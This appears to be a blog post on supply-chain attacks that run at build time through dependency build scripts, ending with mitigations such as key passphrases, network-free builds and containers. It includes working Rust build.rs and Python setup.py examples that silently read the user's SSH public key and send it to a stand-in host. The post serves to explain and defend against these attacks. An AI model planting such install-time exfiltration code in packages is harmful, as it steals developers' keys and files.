Dependencies and Trust
The fact that your dependencies execute arbitrary code at runtime is normal and OK - that’s literally how dependencies work. It sucks that they can do malicious things, but that’s the tradeoff for code reuse.
Arbitrary code at compile time is a bit more interesting. Many languages support running custom build scripts as part of the package installation/build process, and while I've yet to see an attack in the wild, this seems like fairly low-hanging fruit, and it's only a matter of time.
Note that I'm not talking about typosquatting here - that's definitely an issue, but it's outside the scope of this post. I'd also consider it a lesser issue, since it relies on new projects being created with errors in their dependency lists, whereas an existing package turned malicious has a much faster/wider impact (as it will affect existing projects).
Rather, I'm talking about a genuinely useful, widely-used package gone bad, or a situation similar to browser extension takeovers. One can easily imagine a situation where the developer of a widely-used package decides to stop maintaining it due to e.g. a lack of time, and someone with malicious intent "helpfully" puts their hand up to take over maintenance, or someone offers money to become the maintainer of the package. (This second scenario is less likely, but it definitely happened with browser extension takeovers, so I assume it could happen with packages.)
Motivation
There are a few reasons I find build-time maliciousness more interesting. The first is that many production environments are properly isolated from the outside world (for example, with containers and/or firewalls). It is also the case that, for more complex software projects, the end product may not run directly on a developer’s machine - the developer might run tests and push to either a CI server which does the build, or to a staging environment.
A developer’s machine, on the other hand, often has unfettered access to the outside world, and often has interesting stuff lying around like source code (more valuable for proprietary codebases, of course) or SSH keys.
The second reason is related, but different - there are many more "exit points" for information gleaned at build time. While there may only be one prod instance, developers and CI jobs build the software countless times, and all it takes is a single poorly-configured developer machine/CI host/container.
Implementation details
What follows is a deeper dive into the specifics of implementing this attack in a few languages. Rust, C/C++, and Python are the languages I use day-to-day, so I'll be looking at those.
Rust
I’ve written some proof-of-concept code here, and I even went and published it to crates.io (if you’re not familiar with it, this is the Rust-endorsed source of external packages).
The code itself is very boring (check `build.rs` in the root folder if you're unfamiliar with Rust), and clearly isn't genuinely malicious (it just opens some interesting files, and sends some harmless data over a network).

Rather, the interesting part is how easy it is to use this package, and that you would see nothing untoward if you were to use it. Nothing during the download/installation/compilation process tells you that this package uses a `build.rs` (not uncommon for Rust packages, but possibly rare enough to notify about), and it'll just run that code completely silently.
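To make that concrete, here's a minimal sketch of what such a build script could look like. This is not the published PoC - the file path and host are purely illustrative - but it's all the machinery the attack needs, using nothing beyond the standard library:

```rust
// build.rs - Cargo compiles and runs this automatically before building
// the crate; the downstream user never opts in.
use std::fs;
use std::io::Write;
use std::net::TcpStream;

fn main() {
    // Read an "interesting" file from the building user's machine.
    // (Illustrative path; a real attack would cast a wider net.)
    let home = std::env::var("HOME").unwrap_or_default();
    let contents = fs::read_to_string(format!("{}/.ssh/id_rsa.pub", home))
        .unwrap_or_default();

    // Ship it out. None of this shows up in the build output.
    if let Ok(mut stream) = TcpStream::connect("example.com:80") {
        let _ = write!(
            stream,
            "POST /collect HTTP/1.1\r\nHost: example.com\r\nContent-Length: {}\r\n\r\n{}",
            contents.len(),
            contents
        );
    }
}
```

Note that the package's Cargo.toml doesn't need to advertise any of this: a `build.rs` in the package root is picked up automatically.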
C/C++
I’ve lumped these two together since their “build system” is the same. C/C++ both do very well in this area for a few reasons.
Firstly, there is no standard packaging system. If you want to use an external C/C++ dependency, the most common approach is to ensure that this package is installed system-wide, and link against it. Note the lack of a compilation step here. While OS package managers certainly come with their own trust issues, “not compiling in the first place” is certainly a valid way to stop compile-time attacks.
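For illustration, this is what that usual flow looks like (using libcurl purely as an example of a system-installed library):

```sh
# The library was compiled by the OS package manager, not by us. We only
# compile our own code and link against the prebuilt library, so the
# dependency never gets a chance to run anything during our build.
cc main.c $(pkg-config --cflags --libs libcurl) -o myapp
```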
Secondly, even if you're not linking against a system-wide installation, there is no standard build system for compiling code. While GNU autotools, CMake, Meson, etc. can all run code at compile time, if you're integrating another C/C++ project into your own, the most common way I've seen of doing it is to keep your own copy of the dependency in the source tree, and extend your existing build system to cover that dependency.
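As a rough sketch of that vendoring approach (CMake here, with illustrative paths and names), the dependency's sources get compiled by build rules you wrote yourself, so none of its upstream build logic ever executes:

```cmake
cmake_minimum_required(VERSION 3.10)
project(myapp C)

# Build the vendored copy with our own rules; the dependency's own build
# system never runs at configure or build time.
add_library(somelib STATIC vendor/somelib/src/somelib.c)
target_include_directories(somelib PUBLIC vendor/somelib/include)

add_executable(myapp main.c)
target_link_libraries(myapp PRIVATE somelib)
```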
If you’ve managed to both use an external repository for C/C++ dependencies, and integrate their build system into yours, then:
- Congratulations! I know from experience that this can be very hard;
- You’re now vulnerable to such a compile-time attack.
While this doesn't make C/C++ invulnerable, the difficulty of integrating dependencies certainly adds a layer of defence.
Python
Python is interesting in that there isn't a compilation process. That said, `setup.py` suffers the exact same problems as Rust's `build.rs` above. It's possibly worse in Python in that every package needs a `setup.py`, and it's normal for them to spew a bunch of errors to stdout/stderr while running, so any warnings would likely be missed. (Rust's build process redirects stdout and stderr to files in the build folder.)
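Here's an equally minimal sketch of the Python side - a `setup.py` whose module-level code runs during `pip install`, before `setup()` is even called. As with the Rust example, the path and host are purely illustrative:

```python
# setup.py - everything at module level runs at install/build time.
import os
import urllib.request

from setuptools import setup

# Read an "interesting" file from the machine running the install.
try:
    with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f:
        data = f.read().encode()
except OSError:
    data = b""

# Ship it out; buried in the usual wall of install-time output, nobody
# would notice a hiccup here.
try:
    urllib.request.urlopen("http://example.com/collect", data=data)
except OSError:
    pass

setup(name="useful-package", version="1.0")
```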
Mitigations
Key passphrases
My guess is that only a minority of people have a passphrase on their private key. There are many things to steal apart from keys, but keys are especially valuable. If you don’t have a passphrase on your SSH key, go away and fix that right now! It’s important for defending against much more than this specific attack.
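Adding (or changing) a passphrase on an existing key doesn't require generating a new one - assuming the common default key location:

```sh
# Prompts for a new passphrase and re-encrypts the key in place.
ssh-keygen -p -f ~/.ssh/id_rsa
```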
No network access during build
This is an approach Debian has taken as part of their reproducible builds project, and it's a valid defensive layer. The problem here is that build-time malicious code is free to read files at build time, and ship out their contents later, once the program has network access. This can certainly be locked down with the usual security measures (containers/firewalls/etc.), but it isn't watertight.
Jails/Containerisation
A logical extension of "no network access during the build" is to use jails (or containers) for builds. This is the most complete solution - enforcing at the OS level that a process only has permission to access the current directory and its children, plus a couple of known-good system locations (e.g. `/usr/include/`), would definitely stop these attacks.
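As a rough sketch of what this could look like with off-the-shelf tools (Docker and the official rust image here; the cache volume name is illustrative):

```sh
# Fetch dependencies up front - the only step that needs the network -
# caching them in a named volume.
docker run --rm -v "$PWD":/src -w /src \
    -v cargo-cache:/usr/local/cargo/registry \
    rust:latest cargo fetch

# Compile with networking disabled: build scripts can still read files
# under /src, but they have nowhere to send them and can't see the rest
# of the host filesystem.
docker run --rm --network=none -v "$PWD":/src -w /src \
    -v cargo-cache:/usr/local/cargo/registry \
    rust:latest cargo build --release
```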
The main problem with this is the occasional build script that genuinely needs to do weird things (e.g. diesel introspecting a database to build a schema for compile-time database type safety). Package exceptions could of course be added, but the question is “who maintains these exceptions?” If the package authors do it, I can pretty much guarantee users will stop paying attention and we’ll be back at square one. If the end-users of the package are responsible for that whitelist, then it’ll definitely be well-audited, but is that an acceptable amount of pain to inflict on end-users of packages?